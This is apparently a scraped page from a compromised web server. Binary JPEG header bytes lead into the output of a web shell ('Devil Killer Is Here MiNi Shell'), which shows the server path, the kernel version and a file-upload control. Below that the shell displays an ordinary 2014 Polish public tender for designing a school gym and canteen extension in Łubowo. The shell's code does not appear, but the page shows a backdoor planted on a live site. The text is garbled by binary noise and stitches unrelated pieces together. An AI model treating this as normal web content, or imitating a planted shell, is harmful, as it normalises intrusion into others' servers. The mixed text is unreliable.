JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140925/203925-N-2014.html

<p class="kh_header"><b>Borne Sulinowo: Wykonanie kompleksowej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem decyzji o pozwoleniu na budowę oraz pełnienie wielobranżowego nadzoru autorskiego dla zadania rozbudowy z przebudową budynku Zespołu Szkół w Łubowie o budynek sali gimnastycznej z zapleczem socjalno-technicznym i higieniczno-sanitarnym oraz pomieszczeniami stołówki z pełnym zapleczem kuchennym, socjalnym i magazynowym</b><br>
<b>Numer ogłoszenia: 203925 - 2014; data zamieszczenia: 25.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Borne Sulinowo , Al. Niepodległości 6, 78-449 Borne Sulinowo, woj. zachodniopomorskie, tel. 094 3734125, faks 094 3734133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bornesulinowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompleksowej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem decyzji o pozwoleniu na budowę oraz pełnienie wielobranżowego nadzoru autorskiego dla zadania rozbudowy z przebudową budynku Zespołu Szkół w Łubowie o budynek sali gimnastycznej z zapleczem socjalno-technicznym i higieniczno-sanitarnym oraz pomieszczeniami stołówki z pełnym zapleczem kuchennym, socjalnym i magazynowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie kompleksowej dokumentacji projektowo-kosztorysowej oraz pełnienie wielobranżowego nadzoru autorskiego dla zadania inwestycyjnego pn.: Rozbudowa z przebudową budynku Zespołu Szkół w Łubowie o budynek sali gimnastycznej z zapleczem socjalno-technicznym i higieniczno-sanitarnym oraz pomieszczeniami stołówki z pełnym zapleczem kuchennym, socjalnym i magazynowym na dz. nr 240/5, 240/7, 240/14 i 733 przy ul. Zakątnej 10 w Łubowie, gmina Borne Sulinowo
2.Dokumentację projektowo-kosztorysową należy wykonać w oparciu o Projekt koncepcyjny architektoniczny stanowiący Załącznik Nr 6 do SIWZ, w zakresie niezbędnym do uzyskania prawomocnego pozwolenia na budowę oraz udzielenia zamówienia na realizację tych robót w procedurze zamówień publicznych uregulowanych w Ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907, 984, 1047, 1473, z 2014 r. poz. 423, 768, 811, 915, 1146).
3.Szczegółowy zakres dokumentacji projektowo-kosztorysowej w oparciu o Projekt koncepcyjny architektoniczny stanowi:
a.projekt hali sportowej, będącej salą gimnastyczną szkoły wraz z niezbędnym zapleczem socjalno-technicznym i higieniczno-sanitarnym, połączonej funkcjonalnie z istniejącymi budynkami szkoły; sala z dostępem poza zajęciami lekcyjnymi dla osób z zewnątrz,
b.projekt adaptacji poddasza nowego skrzydła budynku szkoły na pokoje gościnne dla min. 50 osób wraz z świetlicą i pokojem dziennego pobytu z aneksem kuchennym; pokoje 1-, 
2-, 3- i 4- osobowe; każdy pokój z własnym węzłem sanitarnym,
c.projekt remontu i przebudowy istniejącej kotłowni,
d.projekt pomieszczenia technicznego z pompami ciepła,
e.projekt stołówki dla 50 osób z pełnym zapleczem kuchennym, socjalnym i magazynowym, wydzielonych z powierzchni budynku sali gimnastycznej (zakres opracowania do uzgodnienia z Zamawiającym),
f.projekt patio wewnętrznego pełniącego funkcję placu zabaw dla istniejącego przy szkole przedszkola,
g.projekt zagospodarowania terenu nabrzeża jeziora na tereny rekreacyjne - z uwzględnieniem lokalizacji przystani wodniackiej (zgodnie z zaleceniami Zamawiającego),
h.projekt remontu i przebudowy istniejącego boiska zewnętrznego przy szkole na boisko wielofunkcyjne wraz z wykonaniem ogrodzenia, piłkochwytów oraz wykonaniem nawierzchni tartanowej lub o podobnych właściwościach z malowaniem linii do gry oraz zakupem i montażem niezbędnego wyposażenia boiska,
i.projekt dróg, parkingów i chodników wewnętrznych - parkingu dla samochodów osobowych, placów utwardzonych, chodników, wykonanie drogi pożarowej, dojazdu gospodarczego do zaplecza stołówki, drogi gospodarczej - zjazdu do brzegu jeziora; dojścia do terenu rekreacyjnego nad jeziorem od strony zachodniej budynku sali gimnastycznej (dz. nr 733 i 240/5) - schodami terenowymi i pasem terenu utwardzonego; oznakowanie terenu,
j.projekt urządzenia terenów zielonych wokół projektowanych i istniejących obiektów,
k.projekt niezbędnych instalacji wewnętrznych (wodno-kanalizacyjnej, przeciwpożarowej wraz z oznakowaniem, centralnego ogrzewania, wentylacji grawitacyjnej i mechanicznej nawiewno-wywiewnej z odzyskiem ciepła, elektrycznej, odgromowej oraz teletechnicznej - alarmowej, monitoringu pomieszczeń nowoprojektowanych, telefonicznej, RTV/SAT, audiowizualnej, komputerowej,
l.projekt uzbrojenia terenu w niezbędne sieci oraz przyłącza (wodociągowe, kanalizacji sanitarnej, kanalizacji deszczowej, energetyczne),
m.projekt oświetlenia terenu,
n.projekt monitoringu terenu.
Dokumentacja projektowo-kosztorysowa zadania powinna być opracowana z uwzględnieniem wykorzystania odnawialnych źródeł energii (panele fotowoltaiczne, system pomp ciepła i inne możliwe do wykorzystania w obiekcie uzgodnione z Zamawiającym) oraz rekuperacji ciepła.
Należy dążyć do osiągnięcia najwyższej z możliwych klas energooszczędności budynku sali gimnastycznej oraz zachować całkowitą zgodność dokumentacji projektowo-kosztorysowej z wytycznymi Programu Priorytetowego Lemur - Energooszczędne Budynki Użyteczności Publicznej wdrażanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej.
W dokumentacji projektowo-kosztorysowej należy zamieścić pełną dokumentację obliczeń cieplnych i energetycznych, sporządzoną w sposób umożliwiający dokonanie weryfikacji jej zawartości i prawidłowości wykonania obliczeń oraz metrykę obliczeń cieplnych, energetycznych i bilansowych budynku.
Projekt sali gimnastycznej należy opracować z zachowaniem wymagań izolacyjności cieplnej, które będą obowiązywać dla budynków publicznych od 2019 r. (Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. 2002 nr 75 poz. 690 z późniejszymi zmianami).
4.Wykonawca zobowiązany jest pełnić nadzór autorski w okresie realizacji robót budowlanych objętych sporządzoną dokumentacją projektowo-kosztorysową.
5.Szczegółowy zakres zamówienia obejmuje:
5.1.Dokumentację projektową, służącą do opisu przedmiotu zamówienia na wykonanie robót budowlanych, w skład której wchodzi:
a)	rojekt budowlany wielobranżowy w zakresie uwzględniającym specyfikę robót budowlanych - 6 egzemplarzy w formie papierowej, składający się z: projektu zagospodarowania terenu,
projektu architektoniczno-budowlanego wraz z wynikami badań geologiczno-inżynierskich oraz geotechnicznych warunków posadowienia obiektów budowlanych,
b)Projekty wykonawcze dla każdej branży - 4 egzemplarze w formie papierowej, w tym:
- branża architektoniczna: projekt architektury z kolorystyką elewacji,projekt konstrukcji z obliczeniami konstrukcyjnymi (szczegółowe wymiarowanie elementów konstrukcyjnych), uwzględniający szczegóły konstrukcyjne, wraz z wszelkimi zestawieniami materiałów,projekt aranżacji wnętrz uwzględniający sposób wykończenia pomieszczeń  (materiały, wzory, kolory, itp.), projekt detali architektonicznych,projekt elementów małej architektury,projekt zagospodarowania terenu,projekt gospodarki istniejącą szatą roślinną.
- branża drogowa:projekt robót drogowych z uwzględnieniem parkingów, drogi p.poż., chodników, miejsc postojowych, drogi gospodarczej,projekt oznakowania terenu.
- branża sanitarna:projekt sieci wod-kan wraz z przyłączami,projekt sieci kanalizacji deszczowej wraz z przyłączami,projekt instalacji wewnętrznej wod-kan,projekt instalacji p.poż. z oznakowaniem,projekt instalacji wentylacji grawitacyjnej i mechanicznej nawiewno-wywiewnej z odzyskiem ciepła,projekt instalacji c.o.,projekt instalacji solarnej dla potrzeb c.o. i c.w.u.,projekt instalacji pompy ciepła,projekt technologii kotłowni- branża elektryczna:projekt przyłącza elektroenergetycznego,projekt oświetlenia zewnętrznego,projekt instalacji oświetlenia i gniazd wtykowych,projekt instalacji piorunochronnej,projekt instalacji sygnalizacji pożaru,projekt instalacji niskoprądowych (teletechnicznych, telefonicznej, RTV/SAT, alarmowej, sieci komputerowej, audiowizualnej, systemu antywłamaniowego i monitoringu pomieszczeń nowoprojektowanych i terenu oraz kontroli dostępu).

c)Projekt technologiczny kuchni i stołówki z pełnym zapleczem kuchennym, socjalnym i magazynowym - 6 egzemplarzy w formie papierowej (zakres do uzgodnienia z Zamawiającym),
d)Projekt boisk wewnętrznych przeznaczonych do gry w piłkę, siatkówkę, koszykówkę, piłkę ręczną oraz halową piłkę nożną oraz wielofunkcyjnego boiska zewnętrznego - 3 egzemplarze w formie papierowej,
e)	Projekt wyposażenia obiektu wraz zestawieniem finansowym (wyposażenie przystani wodniackiej, sali gimnastycznej, placu zabaw przedszkola, pokojów gościnnych, kuchni, stołówki w  meble, sprzęt RTV i AGD, lampy, akcesoria łazienkowe, lustra, szyldy drzwiowe, ręczniki, pościel, zastawę stołową, sztućce itp.) - 3 egzemplarze w formie papierowej,
f)	Przedmiar robót dla całości zadania - 3 egzemplarze w formie papierowej,
g)	Informacja dotycząca bezpieczeństwa i ochrony zdrowia (dołączona do projektu budowlanego) - 6 egzemplarzy w formie papierowej.
5.2.	Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych dla zakresu objętego dokumentacją projektową dla wszystkich branż wraz z opisem przedmiotu zamówienia na wykonanie robót budowlanych - stanowiącym dla Zamawiającego podstawę udzielenia zamówienia na wykonanie robót budowlanych dla potrzeb zadania - 2 egzemplarze w formie papierowej.
5.3.	Opracowanie kosztorysów inwestorskich dla każdej branży (sporządzonych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym - Dz. U. 2004 Nr 130 poz. 1389 z późniejszymi zmianami) - 3 egzemplarze w formie papierowej.
5.4.	Opracowanie kosztorysów nakładczych dla każdej branży - 3 egzemplarze w formie papierowej.
5.5.	Opracowanie Zbiorczego Zestawienia Kosztów (ZZK) - 3 egzemplarze w formie papierowej.
5.6.	Opracowanie całości dokumentacji w wersji elektronicznej edytowalnej w ogólnodostępnych formatach (DWG, DXF, DOC, XLS, ATH) oraz formacie PDF - 1 szt. na płycie CD lub DVD.
5.7.	Pełnienie wielobranżowego nadzoru autorskiego podczas prowadzenia robót budowlanych realizowanych na podstawie wykonanej dokumentacji projektowo-kosztorysowej, z zastrzeżeniem możliwości odstąpienia przez Zamawiającego od realizacji inwestycji.
(Uwaga! Wynagrodzenie umowne za nadzór autorski nie może stanowić mniej niż 10% wynagrodzenia za wykonanie dokumentacji projektowo-kosztorysowej)
Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w zakresie:
a)	udzielania wyjaśnień Zamawiającemu umożliwiających odpowiedzi na zapytania dotyczące wątpliwości związanych z dokumentacją projektową, jakie wpłyną w trakcie postępowania przetargowego na realizację robót budowlanych,
b)	kontroli zgodności realizacji Inwestycji z dokumentacją projektowo-kosztorysową w toku wykonywania robót budowlanych przez wykonawcę tych robót,
c)	wyjaśniania wątpliwości dotyczących projektu i zawartych w nim rozwiązań na żądanie inwestora, inspektora nadzoru inwestorskiego oraz kierownika budowy, w razie potrzeby przekazywanie rozwiązań uszczegóławiających projekt lub w przypadkach koniecznych rozwiązań projektowych zamiennych,
d)	uzgadniania możliwości i oceny zasadności wprowadzania rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowo-kosztorysowej, a zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego,
e)	czuwania, aby zakres wprowadzanych zmian nie spowodował istotnej zmiany zatwierdzonego projektu budowlanego, wymagającej uzyskania nowego pozwolenia na budowę,
f)	udziału w komisjach i naradach technicznych organizowanych przez Zamawiającego lub wykonawcę robót budowlanych (na budowie lub w innym uzgodnionym miejscu), na których zapewni kompetentny skład specjalistów uprawnionych do podejmowania decyzji,
g)	oceny wyników badań materiałów i elementów budowlanych,
h)	udziału w rozruchu technologicznym lub czynnościach mających na celu uzyskanie projektowanych zdolności użytkowych,
i)	udziału w odbiorze Inwestycji od wykonawcy robót budowlanych, a ponadto w czynnościach mających na celu doprowadzenie do osiągnięcia projektowanych zdolności funkcjonalnych inwestycji, pozostających w bezpośrednim związku z dokumentacją projektowo-kosztorysową - po otrzymaniu pisemnego powiadomienia od Zamawiającego.
Pełnienie nadzoru autorskiego objęte będzie umową na wykonanie projektu. Zamawiający nie narzuca ilości pobytów projektantów. Pobyty związane z nadzorem autorskim będą ograniczone do niezbędnego minimum, a ich ilość będzie uzależniona od tego, czy opracowanie projektowe pozwoli na bezproblemową realizację inwestycji.
Nadzór autorski nad realizacją robót budowlanych prowadzonych w oparciu o opracowaną dokumentację projektowo-kosztorysową będzie sprawowany w okresie obejmującym wszystkie postępowania przetargowe na wykonawcę robót oraz w okresie prowadzonych robót budowlano-montażowych.  Zamawiający przewiduje rozpoczęcie robót budowlanych nie później niż po upływie 1 roku od daty ostatecznego bezusterkowego odbioru dokumentacji projektowo-kosztorysowej.
Zamawiający przewiduje możliwość realizacji robót budowlano-montażowych w kilku etapach, dla których prowadzone będą odrębne postępowania w sprawie udzielenia zamówienia publicznego.
Wykonawca zobowiązany jest wykonać podział dokumentacji projektowej oraz kosztorysowej na etapy, zgodnie z zakresem przewidzianym przez Zamawiającego.
Dniem zakończenia pełnienia nadzoru autorskiego jest dzień odbioru końcowego robót budowlanych i złożenia przez projektantów niezbędnych oświadczeń, wpisów i potwierdzeń wynikających z prawa budowlanego. Zamawiający zakończenie robót budowlanych przewiduje nie później niż w ciągu 4 lat od daty rozpoczęcia robót budowlanych.
Czynności nadzoru autorskiego pełnić będą autorzy projektu. Zamawiający dopuszcza zmianę projektanta pełniącego nadzór autorski wyłącznie w przypadku, gdy zmiana taka jest konieczna i uzasadniona oraz zostanie dokonana zgodnie z wymogami prawa budowlanego oraz zgodnie z prawem zamówień publicznych, a także ustawą o prawie autorskim i prawach pokrewnych.
6.	Dokumentacja powinna spełniać następujące wymagania:
a)	powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
b)	powinna służyć, jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o Ustawę z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907, 984, 1047, 1473, z 2014 r. poz. 423, 768, 811, 915, 1146) oraz do realizacji na jej podstawie pełnego zakresu robót budowlanych niezbędnego dla użytkowania obiektów budowlanych zgodnie z przeznaczeniem,
c)	w projekcie należy przyjąć rozwiązania technologiczne i materiałowe uzgodnione z Zamawiającym, bez wskazywania numerów katalogowych, symboli czy nazw własnych konkretnych producentów urządzeń (materiałów), elementów, itp. Jeżeli jest to niemożliwe należy wskazać kluczowe parametry techniczne, użytkowe, jak i estetyczne, jakie są wymagane w celu prawidłowej realizacji projektu. Wykonawca powinien stosować w dokumentacji rozwiązania standardowe skutkujące optymalizacją kosztów, a w przypadku zamiaru zastosowania materiałów, urządzeń lub rozwiązań niestandardowych powinien uzyskać zgodę Zamawiającego na ich zastosowanie,
d)	w skład dokumentacji powinny wchodzić wszelkie niezbędne opracowania, które są konieczne do realizacji inwestycji,
e)	posiadać wszelkie wymagane prawem ekspertyzy, opinie, uzgodnienia i sprawdzenia, niezbędne do uzyskania prawomocnej decyzji o pozwoleniu na budowę w Starostwie Powiatowym w Szczecinku,
f)	dokumentacja projektowa powinna zawierać oświadczenia projektanta i sprawdzającego, że została wykonana zgodnie z umową, obowiązującymi normami i aktualnymi przepisami techniczno-budowlanymi, jest kompletna z punktu widzenia celu, któremu ma służyć i nadaje się do realizacji oraz posiada niezbędne uzgodnienia w zakresie wynikającym z obowiązujących przepisów,
g)	Wykonawca przenosi na Zamawiającego prawa autorskie do wykonanej dokumentacji projektowej z dniem sporządzenia protokołu końcowego odbioru robót budowlanych wykonanych na podstawie tej dokumentacji,
h)	Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody powstałe w związku z odmową udzielenia Zamawiającemu pozwolenia na budowę z powodu nieprawidłowości wykonanego projektu lub opóźnienia jego wydania z powodu nałożenia przez organ wydający pozwolenie na budowę obowiązku usunięcia nieprawidłowości w projekcie, w tym również szkody polegające na opóźnieniu w realizacji inwestycji.
7.	Do obowiązków Wykonawcy należy uzgodnienie z Zamawiającym rozwiązań funkcjonalnych, użytkowych i technicznych, technologii budowy i standardu wykończenia oraz wyposażenia.
8.	Dokumentacja powinna być opracowana zgodnie z obowiązującymi normami, przepisami, aktualnymi warunkami technicznymi oraz innymi niezbędnymi wymaganiami, w szczególności z:
a)	Ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U.  z 1994 nr 89 poz. 414 z późniejszymi zmianami),
b)	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 nr 75 poz. 690 z późniejszymi zmianami),
c)	Rozporządzeniem Ministra Infrastruktury z dnia 6 listopada 2008 r. w sprawie metodologii obliczania charakterystyki energetycznej budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw ich charakterystyki energetycznej (Dz. U. z 2008 nr 201 poz. 1240),
d)	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 nr 202 poz. 2072 z późniejszymi zmianami),
e)	Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462),
f)	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 nr 130 poz. 1389 z późniejszymi zmianami),
g)	Rozporządzeniem  Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu  bezpieczeństwa   i ochrony zdrowia (Dz. U. z 2003 Nr 120, poz. 1126),
h)	Ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907, 984, 1047, 1473, z 2014 r. poz. 423, 768, 811, 915, 1146),
i)	Obowiązującymi Polskimi Normami i przepisami,
j)	Zasadami wiedzy technicznej.
9.	Przed przystąpieniem do projektowania Wykonawca zobowiązany będzie uwzględnić wskazówki Zamawiającego.
10.	Koszt wszelkich materiałów, czynności i prac, tj. uzyskania map do celów projektowych; uzyskania wymaganych obowiązującymi przepisami decyzji, pozwoleń, uzgodnień (w tym również ZUDP, uzgodnienia z rzeczoznawcą sanitarnym, pożarowym i bhp), ekspertyz, opinii, odkrywek, inwentaryzacji, badań oraz innych prac pomocniczych niezbędnych do prawidłowej realizacji zamówienia oraz niezbędnych do uzyskania prawomocnego pozwolenia na budowę należy ująć w oferowanej cenie.
11.	Wykonawca po zakończeniu wykonania przedmiotu umowy przedłoży Zamawiającemu kompletną pod względem formalnym, prawnym i praktycznym dokumentację wraz z decyzją o pozwoleniu na budowę..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Uzupełnienie i aktualizacja dokumentacji projektowo-kosztorysowej</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania

spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Za spełnienie  warunku posiadania niezbędnego doświadczenia Zamawiający uzna, gdy Wykonawca wykonał min. 1 zadanie polegające na wykonaniu projektu architektonicznego obiektu sportowego typu hala sportowa lub sala gimnastyczna wraz z infrastrukturą towarzyszącą oraz z zagospodarowaniem terenu o przewidywanej kosztorysowej wartości robót budowlanych nie mniejszej niż 5 000 000,00 zł
- Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, których Zamawiający przeprowadzi ocenę spełnienia warunku.

spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, których Zamawiający przeprowadzi ocenę spełnienia warunku.

spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, których Zamawiający przeprowadzi ocenę spełnienia warunku.

spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
